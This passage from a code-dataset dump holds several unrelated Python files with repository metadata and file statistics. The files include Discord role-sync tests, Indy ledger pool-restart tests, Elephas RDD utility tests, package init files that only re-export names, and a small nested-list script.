        Role(id=41, name='old name', colour=35, permissions=0x8, position=1),
    }
    current = {modified, fresh}
    created, updated, deleted = get_roles_for_sync(current, stored)
    assert created == {fresh}
    assert updated == {modified}
    assert deleted == set()
def test_get_roles_returns_roles_to_delete():
    """A role known to the API but gone from the guild is a deletion."""
    obsolete = Role(id=61, name='to delete', colour=99, permissions=0x9, position=2)
    stored = {
        Role(id=41, name='name', colour=35, permissions=0x8, position=1),
        obsolete,
    }
    current = {
        Role(id=41, name='name', colour=35, permissions=0x8, position=1),
    }
    created, updated, deleted = get_roles_for_sync(current, stored)
    assert created == set()
    assert updated == set()
    assert deleted == {obsolete}
def test_get_roles_returns_roles_to_delete_update_and_new_roles():
    """All three kinds of change can coexist in a single sync result."""
    obsolete = Role(id=61, name='to delete', colour=99, permissions=0x9, position=2)
    modified = Role(id=71, name='updated', colour=101, permissions=0x5, position=3)
    fresh = Role(id=81, name='to create', colour=99, permissions=0x9, position=4)
    stored = {
        Role(id=41, name='not changed', colour=35, permissions=0x8, position=1),
        obsolete,
        Role(id=71, name='to update', colour=99, permissions=0x9, position=3),
    }
    current = {
        Role(id=41, name='not changed', colour=35, permissions=0x8, position=1),
        fresh,
        modified,
    }
    created, updated, deleted = get_roles_for_sync(current, stored)
    assert created == {fresh}
    assert updated == {modified}
    assert deleted == {obsolete}
| 36.971154
| 88
| 0.647074
| 557
| 3,845
| 4.258528
| 0.118492
| 0.078415
| 0.078836
| 0.080944
| 0.92032
| 0.903457
| 0.875632
| 0.872681
| 0.810708
| 0.79258
| 0
| 0.06976
| 0.19844
| 3,845
| 103
| 89
| 37.330097
| 0.69987
| 0
| 0
| 0.463415
| 0
| 0
| 0.064239
| 0
| 0
| 0
| 0.020026
| 0
| 0.085366
| 1
| 0.085366
| false
| 0
| 0.012195
| 0
| 0.097561
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
c574edff65ca1199b9bd1a2f87dc9943d1cfee99
| 32
|
py
|
Python
|
pelican/plugins/obsidian/__init__.py
|
jonathan-s/pelican-obsidian
|
9e84a9ec8b2a5018a90556c51e30a628994e0b4f
|
[
"MIT"
] | 13
|
2021-07-03T22:43:05.000Z
|
2022-03-28T11:10:57.000Z
|
pelican/plugins/obsidian/__init__.py
|
jonathan-s/pelican-obsidian
|
9e84a9ec8b2a5018a90556c51e30a628994e0b4f
|
[
"MIT"
] | null | null | null |
pelican/plugins/obsidian/__init__.py
|
jonathan-s/pelican-obsidian
|
9e84a9ec8b2a5018a90556c51e30a628994e0b4f
|
[
"MIT"
] | null | null | null |
from .obsidian import * # noqa
| 16
| 31
| 0.6875
| 4
| 32
| 5.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.21875
| 32
| 1
| 32
| 32
| 0.88
| 0.125
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
3d98c27b23aef75a9d72dad3a0712f7aeac0e851
| 82
|
py
|
Python
|
optim/__init__.py
|
danassutula/maximum_compliance
|
f2407bd9c5f7e36fe43aa51690433fe8bfb2f748
|
[
"MIT"
] | null | null | null |
optim/__init__.py
|
danassutula/maximum_compliance
|
f2407bd9c5f7e36fe43aa51690433fe8bfb2f748
|
[
"MIT"
] | null | null | null |
optim/__init__.py
|
danassutula/maximum_compliance
|
f2407bd9c5f7e36fe43aa51690433fe8bfb2f748
|
[
"MIT"
] | null | null | null |
from . import config
from . import filter
from .optim import TopologyOptimizer
| 13.666667
| 37
| 0.780488
| 10
| 82
| 6.4
| 0.6
| 0.3125
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.182927
| 82
| 5
| 38
| 16.4
| 0.955224
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
3db6d98b73af9be0b80b40e42923fde7c438d39b
| 36
|
py
|
Python
|
dizoo/procgen/coinrun/envs/__init__.py
|
sailxjx/DI-engine
|
c6763f8e2ba885a2a02f611195a1b5f8b50bff00
|
[
"Apache-2.0"
] | 464
|
2021-07-08T07:26:33.000Z
|
2022-03-31T12:35:16.000Z
|
dizoo/procgen/coinrun/envs/__init__.py
|
sailxjx/DI-engine
|
c6763f8e2ba885a2a02f611195a1b5f8b50bff00
|
[
"Apache-2.0"
] | 177
|
2021-07-09T08:22:55.000Z
|
2022-03-31T07:35:22.000Z
|
dizoo/procgen/coinrun/envs/__init__.py
|
sailxjx/DI-engine
|
c6763f8e2ba885a2a02f611195a1b5f8b50bff00
|
[
"Apache-2.0"
] | 92
|
2021-07-08T12:16:37.000Z
|
2022-03-31T09:24:41.000Z
|
from .coinrun_env import CoinRunEnv
| 18
| 35
| 0.861111
| 5
| 36
| 6
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.111111
| 36
| 1
| 36
| 36
| 0.9375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
3dc2855d60986b506b511891f864c99ee2a1a15d
| 270
|
py
|
Python
|
qmhub/electools/elec_core/__init__.py
|
QCMM/dynqmprop
|
0f668072f623a2f5f209ab715bc264a83926309b
|
[
"MIT"
] | null | null | null |
qmhub/electools/elec_core/__init__.py
|
QCMM/dynqmprop
|
0f668072f623a2f5f209ab715bc264a83926309b
|
[
"MIT"
] | null | null | null |
qmhub/electools/elec_core/__init__.py
|
QCMM/dynqmprop
|
0f668072f623a2f5f209ab715bc264a83926309b
|
[
"MIT"
] | null | null | null |
try:
import numba
from . import elec_core_qmqm_numba as elec_core_qmqm
from . import elec_core_qmmm_numba as elec_core_qmmm
except ImportError:
from . import elec_core_qmqm_numpy as elec_core_qmqm
from . import elec_core_qmmm_numpy as elec_core_qmmm
| 33.75
| 56
| 0.796296
| 45
| 270
| 4.333333
| 0.266667
| 0.328205
| 0.287179
| 0.369231
| 0.594872
| 0.369231
| 0.369231
| 0.369231
| 0.369231
| 0
| 0
| 0
| 0.181481
| 270
| 7
| 57
| 38.571429
| 0.882353
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.857143
| 0
| 0.857143
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
9ad191035b2e150859cddd04c09f6204bb37c76f
| 154
|
py
|
Python
|
tableprint/__init__.py
|
veya2ztn/mltool
|
4ed151152845ebe3de128e1f53c478581c1492e4
|
[
"IJG"
] | null | null | null |
tableprint/__init__.py
|
veya2ztn/mltool
|
4ed151152845ebe3de128e1f53c478581c1492e4
|
[
"IJG"
] | null | null | null |
tableprint/__init__.py
|
veya2ztn/mltool
|
4ed151152845ebe3de128e1f53c478581c1492e4
|
[
"IJG"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Tableprint
"""
from .metadata import __author__, __version__
from .printer import *
from .style import *
from .utils import *
| 17.111111
| 45
| 0.688312
| 18
| 154
| 5.444444
| 0.666667
| 0.204082
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.007752
| 0.162338
| 154
| 8
| 46
| 19.25
| 0.751938
| 0.214286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0.25
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
b118be6b633c0f4d26bcc6122d57059c978f77a2
| 40
|
py
|
Python
|
wepppy/wepp/soils/__init__.py
|
hwbeeson/wepppy
|
6358552df99853c75be8911e7ef943108ae6923e
|
[
"BSD-3-Clause"
] | null | null | null |
wepppy/wepp/soils/__init__.py
|
hwbeeson/wepppy
|
6358552df99853c75be8911e7ef943108ae6923e
|
[
"BSD-3-Clause"
] | null | null | null |
wepppy/wepp/soils/__init__.py
|
hwbeeson/wepppy
|
6358552df99853c75be8911e7ef943108ae6923e
|
[
"BSD-3-Clause"
] | null | null | null |
from .horizon_mixin import HorizonMixin
| 20
| 39
| 0.875
| 5
| 40
| 6.8
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.1
| 40
| 1
| 40
| 40
| 0.944444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
b13762ae1b11dcb71e6b124eac5ecaa84a9aa2c9
| 45
|
py
|
Python
|
venv/lib/python2.7/site-packages/netlib/http2/__init__.py
|
sravani-m/Web-Application-Security-Framework
|
d9f71538f5cba6fe1d8eabcb26c557565472f6a6
|
[
"MIT"
] | 3
|
2019-04-09T22:59:33.000Z
|
2019-06-14T09:23:24.000Z
|
venv/lib/python2.7/site-packages/netlib/http2/__init__.py
|
sravani-m/Web-Application-Security-Framework
|
d9f71538f5cba6fe1d8eabcb26c557565472f6a6
|
[
"MIT"
] | null | null | null |
venv/lib/python2.7/site-packages/netlib/http2/__init__.py
|
sravani-m/Web-Application-Security-Framework
|
d9f71538f5cba6fe1d8eabcb26c557565472f6a6
|
[
"MIT"
] | null | null | null |
from frame import *
from protocol import *
| 15
| 23
| 0.733333
| 6
| 45
| 5.5
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.222222
| 45
| 2
| 24
| 22.5
| 0.942857
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
b192ac18496ca59305437c4c1332cfbea5c5c539
| 161
|
py
|
Python
|
firefly/__init__.py
|
fuzzygroup/firefly
|
41724414eaa8884b030d7aedf11e45f09b6869e9
|
[
"Apache-2.0"
] | null | null | null |
firefly/__init__.py
|
fuzzygroup/firefly
|
41724414eaa8884b030d7aedf11e45f09b6869e9
|
[
"Apache-2.0"
] | null | null | null |
firefly/__init__.py
|
fuzzygroup/firefly
|
41724414eaa8884b030d7aedf11e45f09b6869e9
|
[
"Apache-2.0"
] | null | null | null |
from .app import Firefly
from .client import Client
from .version import __version__
try:
import configparser
except:
from six.moves import configparser
| 20.125
| 38
| 0.78882
| 21
| 161
| 5.857143
| 0.52381
| 0.292683
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.173913
| 161
| 7
| 39
| 23
| 0.924812
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.714286
| 0
| 0.714286
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
491a68722e6a7cebdddc94d65ce6d03fc0eecaeb
| 980
|
py
|
Python
|
wrappers/python/tests/ledger/test_build_pool_restart_request.py
|
absltkaos/indy-sdk
|
bc14c5b514dc1c76ce62dd7f6bf804120bf69f5e
|
[
"Apache-2.0"
] | 636
|
2017-05-25T07:45:43.000Z
|
2022-03-23T22:30:34.000Z
|
wrappers/python/tests/ledger/test_build_pool_restart_request.py
|
Nick-1979/indy-sdk
|
e5f812e14962f0d51cf96f843033754ff841ce30
|
[
"Apache-2.0"
] | 731
|
2017-05-29T07:15:08.000Z
|
2022-03-31T07:55:58.000Z
|
wrappers/python/tests/ledger/test_build_pool_restart_request.py
|
Nick-1979/indy-sdk
|
e5f812e14962f0d51cf96f843033754ff841ce30
|
[
"Apache-2.0"
] | 904
|
2017-05-25T07:45:49.000Z
|
2022-03-31T07:43:31.000Z
|
from indy import ledger
import json
import pytest
@pytest.mark.asyncio
async def test_build_pool_restart_request_work_for_start_action():
    """A 'start' pool-restart request must carry the submitter identifier and
    a type-118 operation with the action and datetime echoed back."""
    did = "Th7MpTaRZVRYnPiabds81Y"
    raw = await ledger.build_pool_restart_request(did, 'start', '0')
    request = json.loads(raw)
    operation = {
        "type": "118",
        "action": "start",
        "datetime": "0",
    }
    expected = {"identifier": did, "operation": operation}
    # Subset check: the request may contain extra fields (reqId, etc.).
    assert expected.items() <= request.items()
@pytest.mark.asyncio
async def test_build_pool_restart_request_work_for_cancel_action():
    """A 'cancel' pool-restart request omits the datetime field entirely
    (None is passed through as 'no schedule')."""
    did = "Th7MpTaRZVRYnPiabds81Y"
    raw = await ledger.build_pool_restart_request(did, 'cancel', None)
    request = json.loads(raw)
    operation = {
        "type": "118",
        "action": "cancel",
    }
    expected = {"identifier": did, "operation": operation}
    # Subset check: the request may contain extra fields (reqId, etc.).
    assert expected.items() <= request.items()
| 24.5
| 76
| 0.635714
| 96
| 980
| 6.21875
| 0.354167
| 0.060302
| 0.107203
| 0.154104
| 0.850921
| 0.850921
| 0.720268
| 0.720268
| 0.720268
| 0.720268
| 0
| 0.019048
| 0.25
| 980
| 39
| 77
| 25.128205
| 0.793197
| 0
| 0
| 0.533333
| 0
| 0
| 0.142857
| 0.044898
| 0
| 0
| 0
| 0
| 0.066667
| 1
| 0
| false
| 0
| 0.1
| 0
| 0.1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
492ee598a77589786885516b40f7cc1c81caaa53
| 27
|
py
|
Python
|
detective/__init__.py
|
Little-Tetra/detective
|
af7683c7713eee93e6390903598c2e15eed01e57
|
[
"MIT"
] | null | null | null |
detective/__init__.py
|
Little-Tetra/detective
|
af7683c7713eee93e6390903598c2e15eed01e57
|
[
"MIT"
] | null | null | null |
detective/__init__.py
|
Little-Tetra/detective
|
af7683c7713eee93e6390903598c2e15eed01e57
|
[
"MIT"
] | null | null | null |
from .app import Detective
| 13.5
| 26
| 0.814815
| 4
| 27
| 5.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.148148
| 27
| 1
| 27
| 27
| 0.956522
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
496bbc3a1d4178133aaab47f072622dcb0a51769
| 104
|
py
|
Python
|
src/preprocessor/__init__.py
|
William9923/IF4072-SentimentClassification
|
5e22a6da418056955243c310bab0382e4683b781
|
[
"MIT"
] | null | null | null |
src/preprocessor/__init__.py
|
William9923/IF4072-SentimentClassification
|
5e22a6da418056955243c310bab0382e4683b781
|
[
"MIT"
] | null | null | null |
src/preprocessor/__init__.py
|
William9923/IF4072-SentimentClassification
|
5e22a6da418056955243c310bab0382e4683b781
|
[
"MIT"
] | null | null | null |
from src.preprocessor.interface import IPreprocessor
from src.preprocessor.impl import TextPreprocessor
| 34.666667
| 52
| 0.884615
| 12
| 104
| 7.666667
| 0.666667
| 0.152174
| 0.413043
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.076923
| 104
| 2
| 53
| 52
| 0.958333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
49764d1c4e4abe2b5cf3510ebbb2c9faa3f06032
| 43
|
py
|
Python
|
src/graphics/__init__.py
|
o92design/PythonSpelmotor
|
f8c75be2e51790a06fde8be8eb0a715913baebd8
|
[
"MIT"
] | null | null | null |
src/graphics/__init__.py
|
o92design/PythonSpelmotor
|
f8c75be2e51790a06fde8be8eb0a715913baebd8
|
[
"MIT"
] | null | null | null |
src/graphics/__init__.py
|
o92design/PythonSpelmotor
|
f8c75be2e51790a06fde8be8eb0a715913baebd8
|
[
"MIT"
] | null | null | null |
from .GraphicsEngine import GraphicsEngine
| 21.5
| 42
| 0.883721
| 4
| 43
| 9.5
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.093023
| 43
| 1
| 43
| 43
| 0.974359
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
49840fa880679be68812ac05e7e2ceefc3d5a204
| 90
|
py
|
Python
|
c__88.py
|
fhansmann/coding-challenges
|
eebb37565c72e05b77383c24e8273a1e4019b58e
|
[
"MIT"
] | null | null | null |
c__88.py
|
fhansmann/coding-challenges
|
eebb37565c72e05b77383c24e8273a1e4019b58e
|
[
"MIT"
] | null | null | null |
c__88.py
|
fhansmann/coding-challenges
|
eebb37565c72e05b77383c24e8273a1e4019b58e
|
[
"MIT"
] | null | null | null |
# Build a 3 x 5 x 8 nested list of zeros (3 rows, each with 5 columns of
# 8 zeros), using independent sublists so mutating one cell never leaks
# into its siblings.
#
# Fix: the original reused the loop-variable name `col` for two different
# comprehension levels (both the 8-wide innermost axis and the 5-wide middle
# axis), shadowing the outer binding and misleading readers about which axis
# is which. The indices are never used, so name them `_` per convention; the
# resulting structure is unchanged.
array = [[[0 for _ in range(8)] for _ in range(5)] for _ in range(3)]

# Print the full nested structure for inspection.
print(array)
| 30
| 76
| 0.644444
| 19
| 90
| 3.052632
| 0.578947
| 0.362069
| 0.275862
| 0.448276
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.054795
| 0.188889
| 90
| 2
| 77
| 45
| 0.739726
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 6
|
4995430d22cd5e0f817a1cf9b8f773821d566785
| 134
|
py
|
Python
|
amocrm_asterisk_ng/crm/amocrm/widgets/asterisk_widget/functions/__init__.py
|
iqtek/amocrn_asterisk_ng
|
429a8d0823b951c855a49c1d44ab0e05263c54dc
|
[
"MIT"
] | null | null | null |
amocrm_asterisk_ng/crm/amocrm/widgets/asterisk_widget/functions/__init__.py
|
iqtek/amocrn_asterisk_ng
|
429a8d0823b951c855a49c1d44ab0e05263c54dc
|
[
"MIT"
] | null | null | null |
amocrm_asterisk_ng/crm/amocrm/widgets/asterisk_widget/functions/__init__.py
|
iqtek/amocrn_asterisk_ng
|
429a8d0823b951c855a49c1d44ab0e05263c54dc
|
[
"MIT"
] | null | null | null |
from .GetUsersEmailAddressesQuery import GetUsersEmailAddressesQuery
from .IsUserPhoneNumerQueryImpl import IsUserPhoneNumerQueryImpl
| 44.666667
| 68
| 0.925373
| 8
| 134
| 15.5
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.059701
| 134
| 2
| 69
| 67
| 0.984127
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
770939033610900ae0cb4e4ce864a2f56f676086
| 2,758
|
py
|
Python
|
tests/utils/test_rdd_utils.py
|
MichaelisTrofficus/elephas
|
579165865787e28d7b842af881ca3b6aa65e98ea
|
[
"MIT"
] | 1,674
|
2015-08-17T03:54:10.000Z
|
2022-03-29T12:07:43.000Z
|
tests/utils/test_rdd_utils.py
|
MichaelisTrofficus/elephas
|
579165865787e28d7b842af881ca3b6aa65e98ea
|
[
"MIT"
] | 183
|
2015-08-25T11:34:21.000Z
|
2022-03-22T15:33:59.000Z
|
tests/utils/test_rdd_utils.py
|
MichaelisTrofficus/elephas
|
579165865787e28d7b842af881ca3b6aa65e98ea
|
[
"MIT"
] | 359
|
2015-08-21T20:37:48.000Z
|
2022-03-23T15:41:12.000Z
|
import numpy as np
from elephas.utils import rdd_utils
def test_to_simple_rdd(spark_context):
    """A simple RDD pairs each feature row with its scalar label."""
    x = np.ones((5, 10))
    y = np.ones((5,))
    simple_rdd = rdd_utils.to_simple_rdd(spark_context, x, y)
    assert simple_rdd.count() == 5
    head = simple_rdd.first()
    assert head[0].shape == (10,)
    assert head[1] == 1.0
def test_to_labeled_rdd_categorical(spark_context):
    """With categorical=True the one-hot row becomes its class index (2.0)."""
    x = np.ones((2, 10))
    one_hot = np.asarray([[0, 0, 1.0], [0, 1.0, 0]])
    points = rdd_utils.to_labeled_point(spark_context, x, one_hot, True)
    assert points.count() == 2
    head = points.first()
    assert head.features.shape == (10,)
    assert head.label == 2.0
def test_to_labeled_rdd_not_categorical(spark_context):
    """With categorical=False the raw label value is carried through."""
    x = np.ones((2, 10))
    raw_labels = np.asarray([[2.0], [1.0]])
    points = rdd_utils.to_labeled_point(spark_context, x, raw_labels, False)
    assert points.count() == 2
    head = points.first()
    assert head.features.shape == (10,)
    assert head.label == 2.0
def test_from_labeled_rdd(spark_context):
    """Round-tripping through LabeledPoints preserves array shapes."""
    x = np.ones((2, 10))
    y = np.asarray([[2.0], [1.0]]).reshape((2,))
    points = rdd_utils.to_labeled_point(spark_context, x, y, False)
    back_x, back_y = rdd_utils.from_labeled_point(points, False, None)
    assert back_x.shape == x.shape
    assert back_y.shape == y.shape
def test_from_labeled_rdd_categorical(spark_context):
    """Categorical round-trip re-expands labels to their one-hot shape."""
    x = np.ones((2, 10))
    one_hot = np.asarray([[0, 0, 1.0], [0, 1.0, 0]])
    points = rdd_utils.to_labeled_point(spark_context, x, one_hot, True)
    back_x, back_y = rdd_utils.from_labeled_point(points, True, 3)
    assert back_x.shape == x.shape
    assert back_y.shape == one_hot.shape
def test_encode_label():
    """encode_label one-hot encodes: 1 at the label index, 0 elsewhere."""
    label = 3
    nb_classes = 10
    encoded = rdd_utils.encode_label(label, nb_classes)
    assert len(encoded) == nb_classes
    # FIX: iterate over nb_classes instead of the original hard-coded
    # range(10), which duplicated the constant and would silently
    # under-/over-check if nb_classes were ever changed.
    for i in range(nb_classes):
        if i == label:
            assert encoded[i] == 1
        else:
            assert encoded[i] == 0
def test_lp_to_simple_rdd_categorical(spark_context):
    """Converting back keeps one-hot label vectors of width nb_classes."""
    x = np.ones((2, 10))
    one_hot = np.asarray([[0, 0, 1.0], [0, 1.0, 0]])
    points = rdd_utils.to_labeled_point(spark_context, x, one_hot, True)
    simple = rdd_utils.lp_to_simple_rdd(points, categorical=True, nb_classes=3)
    assert simple.first()[0].shape == (10,)
    assert simple.first()[1].shape == (3,)
def test_lp_to_simple_rdd_not_categorical(spark_context):
    """Non-categorical conversion keeps the scalar label value."""
    x = np.ones((2, 10))
    y = np.asarray([[2.0], [1.0]]).reshape((2,))
    points = rdd_utils.to_labeled_point(spark_context, x, y, False)
    simple = rdd_utils.lp_to_simple_rdd(points, categorical=False, nb_classes=3)
    assert simple.first()[0].shape == (10,)
    assert simple.first()[1] == 2.0
| 32.069767
| 79
| 0.663162
| 435
| 2,758
| 3.967816
| 0.117241
| 0.097335
| 0.162225
| 0.089224
| 0.823291
| 0.803592
| 0.73175
| 0.73175
| 0.73175
| 0.695829
| 0
| 0.043848
| 0.18963
| 2,758
| 85
| 80
| 32.447059
| 0.728412
| 0
| 0
| 0.484375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.3125
| 1
| 0.125
| false
| 0
| 0.03125
| 0
| 0.15625
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
77156adb6b98fd98b7a209257fa4e4af836daf66
| 96
|
py
|
Python
|
composite_pattern/composite_wrapper.py
|
sebastianmaxwell1/sweepstakes_1
|
d76f4276e983f7ee971f8c6beefc53dff37c1bb3
|
[
"MIT"
] | null | null | null |
composite_pattern/composite_wrapper.py
|
sebastianmaxwell1/sweepstakes_1
|
d76f4276e983f7ee971f8c6beefc53dff37c1bb3
|
[
"MIT"
] | null | null | null |
composite_pattern/composite_wrapper.py
|
sebastianmaxwell1/sweepstakes_1
|
d76f4276e983f7ee971f8c6beefc53dff37c1bb3
|
[
"MIT"
] | null | null | null |
from composite_pattern.supervisor import Supervisor
from composite_pattern.worker import Worker
| 32
| 51
| 0.895833
| 12
| 96
| 7
| 0.5
| 0.309524
| 0.47619
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.083333
| 96
| 2
| 52
| 48
| 0.954545
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
77267b525b4e3ce6f20a04a29a07292ed6b7f3be
| 319
|
py
|
Python
|
app/views.py
|
TheMoonWalker1/TJStar
|
bb9c9a0234386b52f870b18b2654ae25bdc8eed1
|
[
"Unlicense"
] | null | null | null |
app/views.py
|
TheMoonWalker1/TJStar
|
